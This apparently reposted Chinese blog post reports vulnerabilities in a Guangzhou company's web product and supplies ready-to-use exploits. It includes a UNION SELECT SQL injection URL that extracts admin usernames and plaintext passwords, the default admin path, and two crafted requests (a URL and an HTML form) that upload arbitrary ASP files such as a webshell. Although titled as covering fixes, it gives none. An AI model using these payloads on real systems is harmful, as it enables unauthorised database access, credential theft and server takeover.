网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

广州某公司网站系统几个漏洞及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] script/scriptscript/scriptby Mr.DzY from www.0855.tv今天有一赌友让帮百度一下,有木有老千用的赌具。蛋疼ing....无奈之下,百度搜:摇控麻将桌,透视牌九等关键字。发现是广州某公司开发的一套...

<script></script><script></script>

by Mr.DzY from www.0855.tv

 

今天有一赌友让帮百度一下,有木有老千用的赌具。蛋疼ing....

 

无奈之下,百度搜:摇控麻将桌,透视牌九等关键字。发现是广州

 

某公司开发的一套程序,习惯性的检测了一下。发现几处严重的安全漏洞

 

默认后台:admin/Admin_Login.asp

 

No.1 SQL注入:

http://www.2cto.com /ko/ShowProduct.asp?ID=615 union select 1,u_name,3,4,5,6,7,pwd,9,10,11,12,13,14,15,16,17,18 from adminuser

 

很典型的Sql注入。密码是明文的。

 

No.2 上传漏洞:

 

漏洞文件:admin/upload_flash.asp

片段:

<%

uppath=request("uppath")&"/"    '文件上传路径

filelx=request("filelx")        '文件上传类型

formName=request("formName")      '回传到上页面编辑框所在Form的Name

EditName=request("EditName")      '回传到上页面编辑框的Name

ImgName=request("ImgName")      '回传到上页面编辑框的Name

%>

<html>

<head>

<title>文件上传</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<style type="text/css">

<!--

td{font-size:12px}

a{color:#000000;text-decoration: none}

a:hover{text-decoration: underline}

.tx{height:16px;width:30px;border-color:black black #000000;border-top-width:0px;border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 12px; background-color: #eeeeee; color: #0000FF}

.button{font-size:12px;border-top-width:0px;border-right-width:0px;border-bottom-width:0px;border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}

.tx1{height:20px;width:30px;font-size:12px;border:1px solid;border-color:black black #000000;color: #0000FF}

-->

</style>

<script language="javascript">

<!--

function mysub()

{

    esave.style.visibility="visible";

}

-->

</script>

<script language="JavaScript" type="text/JavaScript">

function Click(){

window.event.returnValue=false;

}

document.oncontextmenu=Click;

</script>

</head>

 

<body bgcolor="#FFFFFF" text="#000000" oncontextmenu="window.event.returnvalue=false"  onselectstart="return false" onpaste="return false"oncopy="return false;" oncut="return false;">

<form name="form1" method="post" action="upfile_flash.asp" enctype="multipart/form-data" >

  <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">

    <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>

      <TR><td width=20%></td>

  <TD bgcolor=#104A7B width="60%">

  <TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>

  <TR>

            <td bgcolor=#eeeeee align=center><font color=red>正在上传文件,请稍候...</font></td>

  </tr>

  </table>

  </td><td width=20%></td>

  </tr></table></div>

  <table width="400" border="1" cellspacing="0" cellpadding="3" align="center" bordercolordark="#CCCCCC" bordercolorlight="#000000">

    <tr bgcolor="#CCCCCC">

      <td height="22" align="left" valign="middle" bgcolor="#CCCCCC" width="400"> 文件上传

        <input type="hidden" name="filepath" value="<%=uppath%>">

        <input type="hidden" name="filelx" value="<%=filelx%>">

        <input type="hidden" name="EditName" value="<%=EditName%>">

        <input type="hidden" name="ImgName" value="<%=ImgName%>">

        <input type="hidden" name="FormName" value="<%=formName%>">

        <input type="hidden" name="act" value="uploadfile">

      </td>

    </tr>

    <tr align="center" valign="middle">

      <td align="left" id="upid" height="80" width="400"> 选择文件:

        <input type="file" name="file1" style="width:300'" class="tx1" value=""></td>

    </tr>

    <tr align="center" valign="middle" bgcolor="#eeeeee">

      <td bgcolor="#eeeeee" height="24" width="400">

        <input type="submit" name="Submit" value="· 开始上传 ·" class="button" onclick="javascript:mysub()">

      </td>

    </tr>

  </table>

</form>

</body>

</html>

 

 

 

上传有两种方法,仅供学习参考:

 

第一种,IE里直接构造,如下:

 

http:/www.2cto.com /ko/admin/upload_flash.asp?formname=myform&Editname=NewsImg&Imgname=&uppath=../Mr.DzY/pro&filelx=asp

 

第二种,本地另存为upload.htm提交,如下:

 

<form name="form1" method="post" action="http://www.2cto.com /ko/admin/upfile_flash.asp" enctype="multipart/form-data" >

        <input type="hidden" name="filepath" value="../Mr.DzY/">

        <input type="hidden" name="filelx" value="asp">

        <input type="hidden" name="EditName" value="">

        <input type="hidden" name="ImgName" value="">

        <input type="hidden" name="FormName" value="">

        <input type="hidden" name="act" value="uploadfile">

        <td align="left" id="upid" height="80" width="400"> 选择文件:

        <input type="file" name="file1" style="width:300'" class="tx1" value=""></td>

        <input type="submit" name="Submit" value="Submit" class="button" onclick="javascript:mysub()">

</form>

 

 

两种都可直接上传asp(理论是任意文件),竟然如此过滤。。。。。。你伤不起啊。

 

Other:

估计还有其它问题,大家有兴趣自行研究一下。

 

 

欢迎大家和我交流。QQ:376955424

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论